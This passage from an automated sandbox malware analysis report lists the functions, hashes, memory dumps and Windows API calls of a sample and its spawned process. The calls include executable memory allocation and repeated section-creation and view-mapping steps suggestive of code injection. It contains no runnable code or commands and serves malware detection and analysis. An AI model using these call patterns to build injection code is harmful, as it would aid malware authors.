VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F5B507

Memory Dump Source

Source File: 00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f58000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 36bc1d902c5a34a4cded3811efd73488e3831349282e90adac62fc02dbecf49a
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: F6113C79A00208EFDB01DF98C985E98BBF5AF08750F0580A4FA489B365D371EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004019E7 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02CF092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 02CF095F
GetProcAddress., xrefs: 02CF09DC, 02CF09DF, 02CF09E4
l, xrefs: 02CF0966

Memory Dump Source

Source File: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: b4964778d27dd5c9aea483cc72df7d8fe5fb0e80ad3e6696e126dd7367174339
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 333168B6900609CFEB50CF99C880AAEBBF9FF48724F24404AD941A7215D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040217B Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457600ab2e6b562f27fe83362ed4081144c1261d4b4cc3aa12f50db97314043f
Instruction ID: b0f5cd621e5889a427523276a520302fa0894c53478b04dc76a98a6104f30da4
Opcode Fuzzy Hash: 457600ab2e6b562f27fe83362ed4081144c1261d4b4cc3aa12f50db97314043f
Instruction Fuzzy Hash: 7D41CE632141086B9A41D2183D2709E3BE59BE235CB249BE7C973773FDD1A4C817A1D3

Uniqueness

Uniqueness Score: -1.00%

Function 0040217D Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65407831d01de68012423774c83c3fea81d132f0266d0a4fe9ae100c4471d34c
Instruction ID: c68037642d2b4b88848a758ef480b741a8d613f7c2e242108568ac126d1cc187
Opcode Fuzzy Hash: 65407831d01de68012423774c83c3fea81d132f0266d0a4fe9ae100c4471d34c
Instruction Fuzzy Hash: CB41CE63214108679A41D2183D2709E3AE59BE225CB249BE7C973773FDD1A4C817A1D3

Uniqueness

Uniqueness Score: -1.00%

Function 00402188 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba22db28687de17de026d87b7672bc38eea9ddf34eb616ae3223bb44072340c
Instruction ID: c31f878e4552ee647901d08c13c42c7b9bee46c5546bcd0e406724342d5d4055
Opcode Fuzzy Hash: 8ba22db28687de17de026d87b7672bc38eea9ddf34eb616ae3223bb44072340c
Instruction Fuzzy Hash: D541CC632101086BDA41C7186C2709D3BE5ABE625CB25ABDAC9736B3FED164C817A183

Uniqueness

Uniqueness Score: -1.00%

Function 004021A1 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b73523a20dd4d5eb758ece85657ff01b49f7dc46b6599c52181d7bae701f2b
Instruction ID: f27c93ea5fb19a9126cdec7dfb901a61f64bd232b99ff7c89ab316a302d0d062
Opcode Fuzzy Hash: d1b73523a20dd4d5eb758ece85657ff01b49f7dc46b6599c52181d7bae701f2b
Instruction Fuzzy Hash: 3231BC532101046B9E41C7183C2308E3AE5EFE265CB24ABDAC873673FDD160C81BA1C2

Uniqueness

Uniqueness Score: -1.00%

Function 004021CB Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa5821d55b3facc6d0f2f4d590224a1a2e390ab7e4159f8d5c27b876ec7bb2f
Instruction ID: 71e4ad84544b767bcf39e9c9c4391c0157840b4eb49ede458eb3363319ddbd63
Opcode Fuzzy Hash: eaa5821d55b3facc6d0f2f4d590224a1a2e390ab7e4159f8d5c27b876ec7bb2f
Instruction Fuzzy Hash: 7C31BB532201086B5E41C7283C2308E3BE6EBE626CB25AFC6C873673FDD550C81BA0D2

Uniqueness

Uniqueness Score: -1.00%

Function 004021BB Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34f3ff7b8f54312045a2530f86cece731e800efabbd60877df90be80f2eb45c
Instruction ID: b6ca5711a50b7efee0159f302846c4b9acddd6f1e8c6f36e454589e31c9923f4
Opcode Fuzzy Hash: f34f3ff7b8f54312045a2530f86cece731e800efabbd60877df90be80f2eb45c
Instruction Fuzzy Hash: 7C3167532115086B5F41D7286C2308E3BE6ABE626DB15ABC6C873673FED550C82BA1D2

Uniqueness

Uniqueness Score: -1.00%

Function 00402348 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f881abd4d4c80bbb0f02f955a74f9b74fb810e8dba993f55cc0282d5e03c3a7
Instruction ID: 20921a196d2f70f336c197afbd25194a591e440cc2018bb72a27b8d2cfd76f32
Opcode Fuzzy Hash: 6f881abd4d4c80bbb0f02f955a74f9b74fb810e8dba993f55cc0282d5e03c3a7
Instruction Fuzzy Hash: D4215A73615264CBD3019B18914B45177F0FF81348B2044BBCC83AB2E2D6F9C957969B

Uniqueness

Uniqueness Score: -1.00%

Function 02F5B0D4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f58000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 420ae74c37ba0c4238aff698639bd8a589404cb71dd7b40d218dc19122f4f454
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: CC118E72340110AFEB44DF59DCC1FA677EAFB88264B298065EE04CB359E675EC02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: d563942bae2b3abdd7d807a83720178f8332bc454926aa2c2bef7496043ee237
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0901F273A116008FDFA1CF20C804BAA33E9FBC6606F0540A4DA0A9728AE370A941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00402745 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
Instruction ID: 69d4b880b733b20b6e6e8d40225c1187dfda2853922bf69f6b380452bfed4421
Opcode Fuzzy Hash: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
Instruction Fuzzy Hash: 95D0A7321D8ABD0E873BAF242405B4B3F91F99D4807D4158CC4D2CF189CB20D593DB84

Uniqueness

Uniqueness Score: -1.00%

Function 004026D2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
Instruction ID: a8b0c3d885e26e12b4b78e6b62be43aeff16635af6dcc451826105f71ea5402b
Opcode Fuzzy Hash: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
Instruction Fuzzy Hash: E2C02B722C1E336B9B08A10C8CE2BDFF6885936400388100444C2D72C0C300E05304F7

Uniqueness

Uniqueness Score: -1.00%

Function 004027A0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
Instruction ID: 38351c2ed745b14c386feeb15f7f798b9746b37af39e32a5701b5c9e944eb928
Opcode Fuzzy Hash: 0c8559ce6b849e8630471a8e5d616feba08a7a26a2c0d8d38af4418daa939d9c
Instruction Fuzzy Hash: 62C0923264112BCFC6358F2DC48CBD573B7AA9970338705AAC8818741ADB20E1AB8F48

Uniqueness

Uniqueness Score: -1.00%

Function 00402770 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
Instruction ID: 4231ba0c904557ffbbe8bc52a0ffdfb71a90202ecc68a120afadf1cd8174fbf3
Opcode Fuzzy Hash: d42159c6503ca90542c3670edd716fcc7f47a8373946eeb85d274a3b270e0fcb
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: fcbhteaPID: 7992, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	51.9%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	3

Executed Functions

Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401603 Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015F1 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015F5 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015F8 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040161A Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004017DF Relevance: 3.0, APIs: 2, Instructions: 30
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02CF003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CF024D

Strings

kernel32.dll, xrefs: 02CF008F, 02CF0095
cess, xrefs: 02CF018D

Memory Dump Source

Source File: 00000004.00000002.1682340416.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_fcbhtea.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f52d848a7eb621d3bcf27de12283cb4e466daf3c2a9a7caa30bfd242752cbc5a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 83525B74A01229DFDBA4CF58C984BACBBB1BF09314F1480D9E54DAB356DB30AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02EDB417 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

